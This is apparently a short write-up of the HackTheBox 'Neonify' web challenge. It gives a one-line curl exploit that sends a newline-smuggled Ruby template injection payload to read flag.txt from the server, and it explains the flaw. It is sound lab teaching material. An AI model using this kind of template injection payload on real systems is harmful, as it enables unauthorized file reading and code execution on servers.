Post

HackTheBox Neonify Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Neonify Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/303

Description

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Exploitation

1

curl http://94.237.60.154:35761/ -s -X POST -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' | grep -Eo 'HTB{.*}'

Summary

Neonify is an easy-level challenge on Hack The Box that exploits a server-side template injection (SSTI) vulnerability. By sending a crafted payload (<%= File.open('flag.txt').read %>) via a POST request, the server executes the embedded Ruby code and returns the content of flag.txt. The flag is then extracted from the response using grep. This challenge demonstrates the dangers of improper input handling in template rendering systems.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.